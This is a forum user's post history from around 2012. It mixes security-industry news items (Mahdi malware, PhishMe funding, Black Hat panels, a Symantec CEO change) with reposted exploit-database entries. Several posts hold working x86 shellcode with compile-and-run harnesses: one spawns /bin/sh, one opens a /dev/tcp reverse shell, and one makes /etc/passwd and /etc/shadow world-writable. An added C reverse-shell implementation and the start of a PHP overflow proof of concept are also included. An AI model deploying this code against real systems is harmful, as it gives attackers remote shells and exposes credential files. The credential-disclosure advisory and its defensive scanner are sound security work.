DarkyAngel

Active Members
  • Posts

    676
  • Joined

  • Last visited

  • Days Won

    7

Everything posted by DarkyAngel

  1. Mahdi Malware Resurrected, Cuts Ties With C&C Servers

After its command and control (C&C) servers were taken offline last week, it was assumed that the Mahdi (or Madi) operation was finished. Mahdi, the name given to malware that was discovered to be targeting systems in the Middle East, has returned however, and its newest version has some creative changes.

Earlier this month, SecurityWeek reported on Mahdi after researchers at Kaspersky Lab and Seculert revealed its existence. Unfortunately, Kaspersky Lab discovered a new variant of Mahdi on Wednesday. In addition to some code optimizations, this version is able to operate without the need to use a C&C for orders.

“Following the shutdown of the Madi command and control domains last week, we thought the operation is now dead. Looks like we were wrong,” Kaspersky’s Nicolas Brulez explained in a blog post. “The new version appears to have been compiled on July 25th,” he added. “It contains many interesting improvements and new features. It now has the ability to monitor VKontakte, together with Jabber conversations. It is also looking for people who visit pages containing “USA” and “gov” in their titles.”

The new C&C where compromised data is delivered resides in Canada on iWeb. A full report on the newest variant is here.

Source
  2. PhishMe Lands $2.5 Million To Help Employees Recognize Evil Emails

Just in time to throw a poolside Cabana party at the Black Hat conference, Chantilly, Virginia-based PhishMe Inc., a company that teaches security awareness to help users identify “phishing” or targeted attacks, today announced that it has closed a $2.5 million Series A funding round.

PhishMe offers a valuable service to organizations, especially those populated with unsuspecting “click happy” users who can put organizations at risk of data loss and malware infection, and also put their own personal identity and financial well-being at risk. The company’s service helps change employee behavior in responding to targeted phishing attacks. So far, the company says it has trained over 3.5 million employees of government agencies, universities, and large enterprises.

PhishMe offers a “spear phishing simulator” that places employees in real-world "spear phishing experiences" and presents them with appropriate training if they are found to be susceptible.

In terms of putting the new cash to use, the company says it will use the funding to support expansion in the U.S. and abroad, to enhance sales and business development efforts, and to expand technology partnerships while continuing to enhance its product line.

Just this week, security firm Trend Micro released a report revealing that targeted attacks against individuals and organizations are on the rise. According to Trend Micro’s Q2 2012 data, focused attacks against SMBs increased 27% when compared to last quarter’s figures.

The funding round was led by Paladin Capital Group. As part of the deal, Christopher Steed, Vice President at Paladin Capital, is joining PhishMe Inc.'s Board of Directors.

"This strategic partnership will bring a new and unique perspective on cyber security to employees and users worldwide. We look forward to working with Chris and hope this will be a long and beneficial relationship," said Rohyt Belani, CEO and Co-Founder, PhishMe.

"At Paladin, we're proud to support innovative companies like PhishMe that are bringing to market unique solutions that solve major, worldwide problems like security in the cyber age," said Lieutenant General (Ret.) Kenneth Minihan, Managing Director at Paladin Capital. "When you look at the largest data breaches that have occurred over the past few years, it is clear that defending our most vital assets cannot be accomplished through physical and IT security alone. PhishMe's approach to using hands-on cyber security education and awareness to improve Internet safety behaviors is critical to combatting today's most advanced threats."

Source
  3. Qualys Adds IPv6 Support to FreeScan Service

LAS VEGAS - Security B-Sides - Cloud-based security and compliance solutions provider Qualys today announced that its FreeScan service, a free service that lets organizations scan web sites or publicly facing IP addresses for vulnerabilities, malware and SSL issues, now supports IPv6. Using FreeScan, organizations can now scan IPv6 devices to detect possible vulnerabilities and take the steps necessary to remediate them.

As organizations migrate to IPv6, the proliferation of networked devices poses new challenges for security teams that many organizations may not be ready for. “If there is a lack of expertise in IPv6 networking, deploying IPv6-ready devices, such as desktops and laptops with modern operating systems, can cause problems as IPv6 traffic may bypass firewalls, intrusion detection systems and other security protections, allowing IPv6 traffic to reach unintended recipients,” the company said. “In addition, as IPv6 adoption grows, it could increasingly become a target for attackers.”

"While there is a movement for organizations to move to IPv6, they may not be prepared to take the steps necessary to secure these devices," said Scott Crawford, research director for EMA. "Qualys FreeScan is a useful service that allows businesses to test the security posture of IPv6 devices on the Internet after deployment and make sure they are properly configured to help defend organizations against cyber attacks."

Source
  4. You have one post, you want to hand out a keylogger over Messenger (99% bet), and on top of that you are reviving a 2-year-old topic. What am I supposed to think?
  5. Smashing the Future: A Look Back, and the Future of Security

LAS VEGAS - BLACK HAT USA - A panel of security and privacy experts engaged in a free-wheeling discussion of how enterprises have invested in security over the years and beefed up their defenses, but there was still a long way to go.

Jeff Moss, founder of Black Hat, Adam Shostack, senior program manager at Microsoft's Trustworthy Computing Group, Marcus Ranum, chief security officer at Tenable Security, and Bruce Schneier, chief security technologist at BT, talked bluntly about their mistrust of government, the changing nature of cyber-attacks and exploits, and the future of security at a panel on the first day of the Black Hat security conference in Las Vegas. Jennifer Granick, director of civil liberties at the Stanford Law School Center for Internet and Society, acted as moderator of the panel. The panelists had all spoken at the original Black Hat conference in 1997 and were reunited in this session to discuss what had happened in security over the years, and what the future would look like for security.

There were some successes. Malware analysis and detection has made it possible for enterprises to block recognized and known threats effectively, Ranum said. Spam was another area, as “I almost never see spam in my inbox,” Schneier said. Enterprises have improved their defenses to be able to analyze and detect broad-based attacks, even as they struggle to defend against targeted attacks, he said.

However, there was a lot to be worried about, and the panel did not pull any punches in who they thought was to blame. The government wasn't doing its job in providing businesses with valuable intelligence on breaches and threats, the panelists agreed.

Ranum criticized the point made earlier by the keynote speaker, Shawn Henry, a former FBI official and currently president of CrowdStrike Services, that private sector firms bore the brunt of protecting against sophisticated cyber-threats and nation-state attacks. “I lose my cool when I hear people from the government saying that the private sector needs to step up,” Ranum said. “I am not qualified to carry out counter-intelligence against China, that is what the government is for.”

In fact, despite the insistence on information-sharing, the process has been decidedly one-way, Ranum said. Moss agreed, saying how federal officials are very open and excited about the kind of information businesses can share, but the second they are asked what the businesses can receive in return, they clam up. “The security community is flying in the dark on a 'trust us' model while we hand over all this information,” Ranum ranted.

Instead of legislating security policy and breach notification, the government would be better off using its wallet to encourage companies to change their security practices, Schneier said. The NSA can define a security standard, go to the various vendors (the cloud, database, and software providers) and inform them that if they want government business, they have to adhere to that standard, Schneier suggested. Schneier took that a step further, saying that contractual arrangements could begin to drive security and privacy between people and companies. These contracts can specify what the security expectations are and what information and control the customer retains. People are increasingly putting their information and infrastructure in the cloud for convenience, but as a result, relinquish all control, Moss said.

The government wasn't all bad. The government can jump-start technology research, drive adoption of technology within agencies and departments, and in turn force the security market to create new products, Moss said. For example, the government has played a significant role in the development of DNSSEC and secure BGP, which is critical for the future and security of the Internet and online communications, but has almost no commercial interest, Moss said.

When the panel discussed where companies should focus their security spending, Moss was unequivocal. “The best return is on your employees,” Moss said, to cheers and applause from the audience. “I rely on people, not on a widget. I can get all the widgets I need for free from the open source community,” Moss said. Good security staff are important, but the company needs to also invest in managers who can understand how to put people in the right roles and get the best effort. Ranum agreed with Moss, saying that while forensics and malware specialists were critical to the security fight, generalists were also very important in order to see the bigger picture. As more and more companies outsource aspects of their business to third-party providers, such as payroll, there needs to be a generalist on staff who understands how the service will interact with other on-premise software, not a specialist in that payroll system, Ranum said. Schneier pointed out that staff needs to be familiar with the legal and regulatory environment, as well.

Granick asked the panelists to weigh in on whether security will be better or worse in the future. The response was decidedly pessimistic across the board, as things will be “the same.” “We’ll get better at running,” Moss said. Schneier responded, “The bad guys will always run faster.”

Source
  6. Black Hat: Ex-FBI Agent Tells Private Sector to "Step It Up"

LAS VEGAS - BLACK HAT USA - The Federal Bureau of Investigation revamped its approach to fighting terrorists after 9/11. Corporate America can apply those lessons to protect the networks from cyber-attackers, a former official told attendees at the Black Hat security conference.

Attacks have changed, and anyone can now launch a cyber-attack, but organizations haven't changed the way they view security or do business, Shawn Henry, the former executive assistant director of the FBI and currently president of CrowdStrike Services, a division of security startup CrowdStrike, said in his keynote speech on the first day of Black Hat in Las Vegas. Until March 2012, Henry was responsible for all of the FBI's criminal investigations worldwide, including the cyber-investigations, critical incident response group, and international investigations.

There needs to be a new “paradigm” in how business views security, Henry said, and the best way to do that is to take the lessons learned from protecting the physical world. The actual tactics used to launch the attacks may be different, but the theory is the same, he said. The threat from computer network attack is the most significant threat, after weapons of mass destruction, facing society, he said. "The adversary knows that if you want to harm civilized society -- take their water away, do away with their electricity," Henry told attendees.

So much of the data integral to personal lives and the organization's intellectual property is stored on the network, Henry said. When attackers breach the network, it's the data being held hostage and the life of the organization that is at risk. A company could lose a decade's worth of research in a matter of days with a single attack, Henry said. "Today, with a $500 laptop and an Internet connection, anyone anywhere can attack anyone, anywhere," said Henry. Many CEOs still haven't accepted the new reality yet, asking why their organizations would be a target, he said.

The FBI had to change its approach and tactics after 9/11, because it was clear the terrorists were already inside the country, and the best way to catch them was to work with other intelligence agencies to gather and share better intelligence, Henry said. By the same token, the private sector has to accept that companies can't keep focusing on protecting the network perimeter but must acknowledge the adversaries are already inside. Once that is acknowledged, the question is why organizations aren't looking for the adversaries on their networks, Henry said.

Looking for adversaries relies on the organization collecting information about what is happening on the network. But organizations can also think about creating a hostile environment for the adversary. Henry described using “denial and deception,” such as allowing cyber-criminals to steal outdated or wrong data, or just not putting certain types of data on the network in the first place.

To catch the adversaries, organizations must focus on intelligence, Henry said. They need to think strategically, collect information, analyze the situation, and execute, he said. Organizations need to be focusing on granular intelligence, to be able to share high-quality information about the attacks, the origin, and even the entity behind the attacks. "We need to understand who the adversary is," Henry said, "because if we understand who they are, we can take proactive measures." He was very quick to assert that his repeated statements for the private sector to “step up” and be proactive about cyber-threats did not mean he was advocating hacking back against the originators of the threat (as that would be illegal). Instead, he believed that intelligence sharing and partnering with other organizations were important tools.

Some attendees weren't swayed by Henry's impassioned call to action to “stand side by side to protect that line between good and evil.” Information sharing is not as effective if the government is sharing information the public already knows about, Kurt Baumgartner, a researcher at Kaspersky Lab, told SecurityWeek. The government has to provide actionable and worthwhile intelligence, and that really hasn't been the case so far. However, the government is trying to change that to give more valuable information, Baumgartner said.

At a session after Henry's keynote, Marcus Ranum, chief of security for Tenable Security, criticized the premise that the responsibility for network defense was on the private sector and not the government. "I lose my cool when I hear people from the government, or formerly from the government, say the private sector needs to step up," Ranum ranted, adding, "Providing for the common defense is what the government is supposed to do."

Source
  7. Black Hat Survey: More than 1/3 Have Engaged in Retaliatory Hacking

A survey from security firm nCircle suggests that retaliatory hacking is not universally frowned upon. In a poll of 181 attendees of the Black Hat USA 2012 conference in Las Vegas, nCircle asked "Have you ever engaged in retaliatory hacking?” Sixty-four percent said "never," 23 percent said "once," and 13 percent said "frequently."

While more than a third responded in the affirmative, Tim 'TK' Keanini, CTO of nCircle, said the true percentage may be even higher. “Retaliatory hacking is a huge topic at Black Hat this year, but we should take these survey results with a grain of salt,” he said in a statement. “It’s safe to assume some respondents don’t want to admit they use retaliatory tactics. It’s very tempting to strike back out of anger and frustration. However, as infuriating as cyber criminals can be, this ‘eye for an eye’ code of justice can be extremely dangerous.

“There’s a huge difference between a security expert who can qualify attackers and apply appropriate responses and a neophyte who reacts blindly," he added. "The best strategy for most companies is to forget retaliation and concentrate on improving their defenses.”

Source
  8. Linux x86 execve("/bin/sh")

/*
Title: Linux x86 execve("/bin/sh") - 28 bytes
Author: Jean Pascal Pereira <pereira@secbiz.de>
Web: http://0xffe4.org

Disassembly of section .text:

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 50                    push   %eax
 8048063: 68 2f 2f 73 68        push   $0x68732f2f
 8048068: 68 2f 62 69 6e        push   $0x6e69622f
 804806d: 89 e3                 mov    %esp,%ebx
 804806f: 89 c1                 mov    %eax,%ecx
 8048071: 89 c2                 mov    %eax,%edx
 8048073: b0 0b                 mov    $0xb,%al
 8048075: cd 80                 int    $0x80
 8048077: 31 c0                 xor    %eax,%eax
 8048079: 40                    inc    %eax
 804807a: cd 80                 int    $0x80
*/

#include <stdio.h>
#include <string.h>

/* execve("/bin//sh", NULL, NULL), then exit(0). The path is built on the
   stack from "//sh" and "/bin" and terminated by the pushed zero in %eax,
   so the stub contains no NUL bytes. */
char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73"
    "\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\x89\xc1\x89\xc2\xb0\x0b"
    "\xcd\x80\x31\xc0\x40\xcd\x80";

int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    /* Jumps into .data: build 32-bit with an executable data segment,
       e.g. gcc -m32 -z execstack -o sc sc.c */
    (*(void (*)(void)) shellcode)();
    return 0;
}

# 1337day.com [2012-07-25]
Source
  9. unix/x86 Backshell[/dev/tcp],Port(30)

/*
# Title    : unix/x86 Backshell[/dev/tcp],Port(30) - 61 bytes Shellcode
# Author   : KedAns-Dz (Inj3ct0r Team)
# E-mail   : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home     : Hassi.Messaoud (30500) - Algeria
# Web Site : www.1337day.com | www.inj3ct0rs.com
# Platform : unix/x86 - Multiple
# Type     : Shellc0de - 61 bytes
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

// UNIX Universal BackShell Reverse with /dev/tcp on port 30 - old but c00l
//
// The 61 bytes are not machine code: they are the ASCII of the bash line
//     0<&151-;exec 151<>/dev/tcp/127.0.0.1/30;sh <&151 >&151 2>&151
// which opens a TCP connection to 127.0.0.1:30 as fd 151 through bash's
// /dev/tcp pseudo-device and wires a shell's stdin/stdout/stderr to it.
// /dev/tcp is a bash feature (not dash or a plain sh), so the payload has
// to be handed to bash rather than jumped to as code.
char devsc[] =
    "\x30\x3c\x26\x31\x35\x31\x2d\x3b\x65\x78\x65\x63\x20\x31\x35"
    "\x31\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x32\x37"
    "\x2e\x30\x2e\x30\x2e\x31\x2f\x33\x30\x3b\x73\x68\x20\x3c\x26"
    "\x31\x35\x31\x20\x3e\x26\x31\x35\x31\x20\x32\x3e\x26\x31\x35"
    "\x31";

int main(void)
{
    printf("bytes: %zu\n", strlen(devsc));
    execl("/bin/bash", "bash", "-c", devsc, (char *)NULL);
    perror("execl");    /* only reached if bash could not be started */
    return 1;
}

# 1337day.com [2012-07-12]
Source
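The post's 61 bytes are a bash command, so they only work when a bash process interprets them. For comparison, below is the same reverse shell written against the socket API, as an added example for this page (my code, not KedAns-Dz's): socket(), connect(), dup2() the socket over fds 0, 1 and 2, then execve("/bin/sh"), which is what the "sh <&151 >&151 2>&151" part of the one-liner does. The peer 127.0.0.1:30 is reused from the post and is assumed to have a listener (e.g. nc -l -p 30, as root since the port is below 1024).

```c
/* Added example: reverse shell via the socket API, equivalent to the
 * /dev/tcp one-liner in the post above. Not the post's own code. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Fill *out for ip:port. Returns 0, or -1 if ip is not a dotted quad. */
int make_peer(const char *ip, unsigned short port, struct sockaddr_in *out)
{
    memset(out, 0, sizeof *out);
    out->sin_family = AF_INET;
    out->sin_port = htons(port);              /* network byte order */
    return inet_pton(AF_INET, ip, &out->sin_addr) == 1 ? 0 : -1;
}

/* Connect to ip:port and replace this process with a shell whose
   stdin/stdout/stderr are the socket. Returns -1 only on failure
   before execve(); on success it never returns. */
int reverse_shell(const char *ip, unsigned short port)
{
    struct sockaddr_in peer;
    if (make_peer(ip, port, &peer) < 0)
        return -1;
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return -1;
    if (connect(s, (struct sockaddr *)&peer, sizeof peer) < 0) {
        close(s);
        return -1;
    }
    /* Same effect as "sh <&151 >&151 2>&151" in the bash payload. */
    for (int fd = 0; fd < 3; fd++) {
        if (dup2(s, fd) < 0) {
            close(s);
            return -1;
        }
    }
    if (s > 2)
        close(s);                             /* the three copies keep it open */
    char *const argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return -1;                                /* execve() failed */
}

int main(void)
{
    /* 127.0.0.1:30 is the target from the post; assumes a listener there. */
    if (reverse_shell("127.0.0.1", 30) < 0)
        perror("reverse_shell");
    return 1;
}
```

Unlike the bash version, this does not depend on the shell found at the far end of an exec chain, and a failed connect() is reported instead of silently leaving a shell reading from a closed fd.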
  10. Linux x86 chmod 666 /etc/passwd & /etc/shadow

/*
Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes
Author: Jean Pascal Pereira <pereira@secbiz.de>
Web: http://0xffe4.org (impuls23 lab | IT Security & Development)

Disassembly of section .text:

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 66 b9 b6 01           mov    $0x1b6,%cx
 8048066: 50                    push   %eax
 8048067: 68 73 73 77 64        push   $0x64777373
 804806c: 68 2f 2f 70 61        push   $0x61702f2f
 8048071: 68 2f 65 74 63        push   $0x6374652f
 8048076: 89 e3                 mov    %esp,%ebx
 8048078: b0 0f                 mov    $0xf,%al
 804807a: cd 80                 int    $0x80
 804807c: 31 c0                 xor    %eax,%eax
 804807e: 50                    push   %eax
 804807f: 68 61 64 6f 77        push   $0x776f6461
 8048084: 68 2f 2f 73 68        push   $0x68732f2f
 8048089: 68 2f 65 74 63        push   $0x6374652f
 804808e: 89 e3                 mov    %esp,%ebx
 8048090: b0 0f                 mov    $0xf,%al
 8048092: cd 80                 int    $0x80
 8048094: 31 c0                 xor    %eax,%eax
 8048096: 40                    inc    %eax
 8048097: cd 80                 int    $0x80
*/

#include <stdio.h>
#include <string.h>

/* chmod("/etc//passwd", 0666); chmod("/etc//shadow", 0666); exit(0).
   0x1b6 (0666) is loaded into %cx once and survives both syscalls, since
   int 0x80 only clobbers %eax. Both calls need root to succeed. */
char shellcode[] =
    "\x31\xc0\x66\xb9\xb6\x01\x50\x68\x73\x73\x77\x64"
    "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3"
    "\xb0\x0f\xcd\x80\x31\xc0\x50\x68\x61\x64\x6f\x77"
    "\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74\x63\x89\xe3"
    "\xb0\x0f\xcd\x80\x31\xc0\x40\xcd\x80";

int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    /* Jumps into .data: build 32-bit with an executable data segment,
       e.g. gcc -m32 -z execstack -o sc sc.c */
    (*(void (*)(void)) shellcode)();
    return 0;
}

# 1337day.com [2012-07-25]
Source
  11. Examining the patterns taken from data collected in the aftermath of more than 140 million blocked infection attempts, security vendor Trend Micro says that targeted attacks against individuals and organizations are on the rise. According to the data, focused attacks against SMBs, as apparent from the types of attempts blocked by Trend Micro, increased 27% in Q2 2012 when compared to last quarter’s figures.

Trend Micro's report also outlines increasingly sophisticated attacks against individuals in the form of ATS (Automatic Transfer System) attacks. Large organizations weren't exempt either. The IXESHE attack campaign, which has existed since at least July 2009, showed cybercriminals stepping up their tactics to gain access to large multinational corporations without notice. Trend found that IXESHE has been targeting East Asian governments, electronics manufacturers, and telecommunications companies, and has used compromised servers housed inside targeted organizations as command-and-control (C&C) servers. In late May, Tom Kellermann, vice president of cybersecurity at Trend Micro, told SecurityWeek that the technique of using compromised servers as C&C servers is being adopted by elite hacker crews, and he rated the sophistication of the IXESHE campaign as a 9.3 out of 10.

Other data from Trend's Q2 report includes the rise of malicious Android applications in Q2 2012, marking a 300% increase when compared to last quarter. Moreover, ransomware attacks are making a comeback, but the mainstays (Blackhole Exploit Kit) are still proven methods of victimization for cybercriminals.

“Cybercriminals are cherry-picking their targets to launch more successful campaigns,” the report notes. “Based on Trend Micro observations this quarter, cybercriminals are poised to become more aggressive, using more sophisticated tools like automatic transfer systems (ATSs) and the Blackhole Exploit Kit to enhance the power of their respective ZeuS, SpyEye, and other botnets.”

The report also makes note of how Pinterest has become the social media platform of choice among criminals in Q2 2012; and examines the top 5 social engineering lures being used across all social networking sites, including Diablo 3, Instagram Android, Angry Birds Space, the London 2012 Olympics, and Tibet. Trend’s Q2 2012 report is available here.

Source
  12. They've gotten cocky ever since the Yahoo business. Meanwhile, another source says:
  13. While Apple releases OS X 10.8... Kaspersky Lab Launches New Security Software Suite for Mac OS X

Kaspersky Lab, the Russian Internet security software maker behind highly rated consumer security software for PCs, on Monday announced Kaspersky Security for Mac, the company’s new security suite designed to protect Mac OS X based systems. The company says its latest Mac security offering combines real-time scanning, proactive detection and cloud-based threat intelligence to help protect Mac OS X users.

While Mac OS is still relatively safe compared to its PC counterparts, threats still exist, and a recent increase in malware targeting Mac OS systems has served as a wake-up call. The most recent incident put Mac malware under the spotlight when the Flashback malware ultimately infected upwards of 700,000 Macs back in March 2012, creating the largest Mac-based botnet ever.

Aside from malware that can infect a user’s system, other Web and email based threats and scams can put users in danger as well. In order to address other threats, Kaspersky Security for Mac includes a URL Advisor along with Anti-Phishing Technology to guard against fake or dangerous websites, a Virtual Keyboard to defeat keyloggers and screen-capture malware, and Parental Controls that can restrict content and Web sites based on category and content.

“As Mac computers become more popular, they become a bigger target for cybercriminals trying to steal as much money as they can for the smallest amount of effort,” the company said in a statement. “Even if you’re not concerned about the threat to your own Mac computer, your unprotected machine can even be used to store and distribute Windows-based malware to your PC-using friends and colleagues.” In fact, a study released by Sophos earlier this year showed that 1 in 5 Macs had Windows-based malware on them.

Kaspersky Security for Mac looks and behaves like a typical Mac OS application, the company says. It follows the same installation process as any other OS X application, and is compatible with the latest version of Mac OS X - Mountain Lion 10.8. “It’s true that there are fewer malicious programs written for the Mac platform compared to the Windows platform,” the company said. “But that doesn’t mean OS X machines are built to be inherently more secure against malware, it means cybercriminals have been focused on attacking the platform with the most potential victims. As more people use Macs, the OS X market becomes a more lucrative target.”

Kaspersky Security for Mac is available immediately in the United States and Canada, priced at $39.95 for a 1-year subscription that will protect a single system, or $59.95 which includes 3-user licenses. Kaspersky Security for Mac is also available through Kaspersky ONE Universal Security, which protects multiple consumer devices. A free 30-day trial is also available.

Source
  14. My mistake, it didn't jump out at me when I looked at the topics here. I'd ask a mod to merge them or delete mine.
  15. Anonymous Targets Australian Government Over Proposed Changes to Privacy Laws

Anons supporting OpAustralia have taken down at least ten domains maintained by the Queensland government this week, in protest of proposed changes to privacy laws. The attacks started over the weekend, as Australia’s Prime Minister was set to host a chat on Google+.

“The Australian Government is attempting to strip away its citizens’ internet rights by forcing them to surrender passwords and internet usage data... Unless the Government starts acting in the best interest of its people, it will continue to bring the noise... We no longer know about many of the activities of our governments while our governments have the means to accumulate unprecedented vast banks of data about us...,” OpAustralia said in a statement.

The proposed changes that the Anons were protesting would require electronic communications, such as email and data from social networking sites, or other Web platforms, to be collected and stored by local ISPs for up to two years. Additional details on the proposed changes can be seen here.

On Monday, OpAustralia’s Twitter account told the government to be prepared as “something big is heading your way...” Earlier this week, data taken from compromised Queensland-based government servers appeared online. Included with the leaked data is a 194MB database, which is said to contain government tracking data. SecurityWeek was unable to confirm the details in this file with local authorities due to differences in time zones. We’ll update with more information if it becomes available.

Source
  16. Symantec Pushes Enrique Salem Out, Appoints New CEO

Saying it was the board's judgment that it was in the best interests to make a change in the CEO position, Symantec today said that Enrique Salem, president and CEO, has stepped down effective immediately and would be replaced by Steve Bennett, who will take over the role as president and chief executive officer, in addition to his continued role as chairman of the board.

"The board's decision to make a leadership change was not based on any particular event or impropriety but was instead made after ongoing consideration and a deliberative process," said Dan Schulman, Symantec's newly-appointed lead director.

"Enrique Salem has been a significant contributor during his 19 years associated with Symantec, including the last three years as CEO," said Bennett. "While progress has been made over the last three years in many areas, it was the board's judgment that it was in the best interests of Symantec to make a change in the CEO."

"My view is that Symantec's assets are strong and yet the company is underperforming against the opportunity," Bennett said. "I'm looking forward to working with the team to build upon the significant assets in place to help Symantec accelerate value creation for all of its stakeholders."

Bennett joined Symantec's board of directors in February 2010 and became chairman in 2011. He previously was president and chief executive officer at Intuit from 2000 to 2007. Bennett joined Intuit after a 23-year career at General Electric. During his career at GE, he held a variety of key management roles in numerous areas of the business, including GE Capital e-Business, GE Capital Vendor Financial Services, GE Electrical Distribution and Control, GE Appliances, GE Medical Systems and GE Supply. He currently serves on boards at American Airlines and parent company AMR Corporation, along with Qualcomm. He graduated from the University of Wisconsin with a bachelor's degree in finance and real estate.

"We are fortunate as a board to be able to name Steve as CEO and achieve continuity in leadership,” Schulman said. “Steve understands the company well, had a great track record at Intuit and General Electric and is a perfect fit for moving the company forward."

The news comes the same day that the company reported the results of its first quarter of fiscal year 2013, ended June 29, 2012. The company reported GAAP revenue for the fiscal first quarter of $1.668 billion, up 1 percent year-over-year and up 4 percent after adjusting for currency.

Source
  17. Large Global Banks Still Plagued by Conficker, Zeus Malware: Report
Some of the world's largest banks are operating while infected with serious malware, according to a recent report. An analysis of 24 of the world's largest banks showed that 18 banks contained malicious infections, including Conficker, DNSChanger, Gameover Zeus, BlackHole Exploit Kit, and Fake AV, Lookingglass Cyber Solutions said in a report released July 25.

Researchers also were able to track "tens of thousands" of machines infected by Flashback in March, Derek Gabbard, CEO of Lookingglass Cyber Solutions, told SecurityWeek. Lookingglass tracked over 104 malicious IP addresses from around the world since January to compile this analysis. In March alone, researchers tracked 42 million infected IP addresses and found 40 percent had multiple infections. Interestingly, Lookingglass was able to determine that a significant majority of these infected machines were not public-facing systems, such as a Web server or transaction systems, Gabbard said.

Even after three years, there was a "very substantial Conficker infection," Gabbard said. The Conficker Working Group has been working for the past three years to help organizations and users mitigate and remediate their machines infected with the Conficker worm. Even so, the worm remains entrenched in the financial services industry, with 10 of the 24 banks analyzed still having infected machines, Lookingglass found. According to Microsoft's Security Intelligence Report released in April 2012, Microsoft said the Conficker worm was detected approximately 220 million times worldwide in the past two and a half years.

"Nothing surprises me anymore," Gabbard said, adding that he was "never surprised to see things we thought were old and dead crop back up."

While Conficker was the most common, Lookingglass also found a lot of DNSChanger infections among these banks, despite various outreach programs this spring to educate users about the malware. However, Gabbard admitted that he had expected to see more DNSChanger infections than what was observed, so the cleanup efforts were effective to some extent. There were also machines infected with malware to become part of the Cutwail botnet, Gabbard said.

Lookingglass wasn't picking on the financial services industry in the report. Of the 17 industries Lookingglass monitored, 14 were infected with "high level threats," the company said. Compared to other sectors, financial services companies are substantially faster than others when it comes to remediation, Gabbard said. Gabbard also said he would be surprised if there was any sector that could claim to not still be battling Conficker infections.

Lookingglass researchers determined that many of the organizations had detected and cleaned up the infections initially, but had been re-infected by partners and suppliers who were similarly infected. Malware from "unclean" networks re-infects previously cleaned networks, "creating a cycle of re-infection among partner and supply chain networks," the company said. This is a problem when the industry shares a common infrastructure, as is the case within the financial services sector. Organizations are not monitoring these re-infections.

"With cyber attacks becoming more intricate and sophisticated, not only do organizations put themselves at risk if they don't take these threats seriously, they also become a liability to their customers and partners," said Gabbard.

The company collected information from various sources, including blacklist blockers, spam lists, feeds from threat intelligence providers, and open source lists, Gabbard said. Lookingglass has been collecting and analyzing this kind of data for a long time and sharing relevant insights with customers, but this is the first time the company has released the data to the public, Gabbard said.
Source
  18. Nessus On Android 1.0.1 Credential Disclosure
[1337day.com banner: Exploit database separated by exploit type (local, remote, DoS, etc.)]
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com

#############################################
Nessus On Android 1.0.1 Credential Disclosure
#############################################

Nessus app for Android, version 1.0.1.
The app allows the user to save Nessus server info (IP/username/password).
The app saves this info to /sdcard/servers.id
This file can be viewed with Notepad and the password is right there in plain text.
This means any app on the system can see that info and possibly transmit it to an attacker.

# 1337day.com [2012-07-24]
Source
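The advisory's point is that a file on shared external storage is readable by every app on the device, so a credential written there in clear text is effectively public. The following is an added example (not code from the advisory, from 1337day or from the Nessus app) of how a defender can audit a directory tree for that class of mistake: it walks a tree standing in for /sdcard, flags files that contain plaintext credential patterns, and reports whether each is world-readable. The directory layout, the file name servers.id and its contents are constructed here; the real app's file format is not shown on the page.

```python
"""Audit a directory tree (standing in for Android shared storage) for files that
hold credentials in plain text. Added example; the sample tree is constructed."""
import os
import re
import stat
import tempfile

# Patterns that usually mark a plaintext secret (chosen for this example).
SECRET_PATTERNS = [
    re.compile(r"(?i)\b(pass(word|wd)?|secret|token)\b\s*[:=]\s*\S+"),
    re.compile(r"[^\s/:@]+:[^\s/:@]+@[\w.-]+"),   # user:pass@host style URLs
]


def world_readable(path):
    """True when the 'other' read bit is set (any local process can read it)."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def scan_file(path, max_bytes=65536):
    """Return a list of (line_no, snippet) hits in one file; [] if none."""
    hits = []
    try:
        with open(path, "rb") as fh:
            data = fh.read(max_bytes)
    except OSError:
        return hits
    text = data.decode("utf-8", errors="replace")
    for no, line in enumerate(text.splitlines(), 1):
        if any(pat.search(line) for pat in SECRET_PATTERNS):
            hits.append((no, line.strip()[:80]))
    return hits


def scan_tree(root):
    """Walk root; map each offending relative path to its hits and permission."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root)] = {
                    "hits": hits,
                    "world_readable": world_readable(path),
                }
    return findings


def build_sample_sdcard():
    """Construct a throwaway tree mimicking /sdcard with one bad file.
    The servers.id format below is invented for the example."""
    root = tempfile.mkdtemp(prefix="sdcard_")
    bad = os.path.join(root, "servers.id")
    with open(bad, "w") as fh:
        fh.write("192.0.2.10|nessus-admin|password=ExampleOnly123\n")
    os.chmod(bad, 0o644)          # world-readable, as shared storage tends to be
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("shopping list\n")
    return root


if __name__ == "__main__":
    for rel, info in scan_tree(build_sample_sdcard()).items():
        flag = "WORLD-READABLE " if info["world_readable"] else ""
        print(f"{flag}{rel}: {info['hits']}")
```

The remediation the finding implies is to keep such data in app-private storage and encrypt it with a key the platform protects, rather than on shared storage; the scanner only tells you where the problem is.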
  19. PHP 6.0 openssl_verify() Local Buffer Overflow PoC
<?php
// ==================================================================================
//
// PHP 6.0 openssl_verify() Local Buffer Overflow PoC
//
// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.
//
// Local Buffer Overflow
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
//
// ==================================================================================
//
// REGISTERS:
// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8
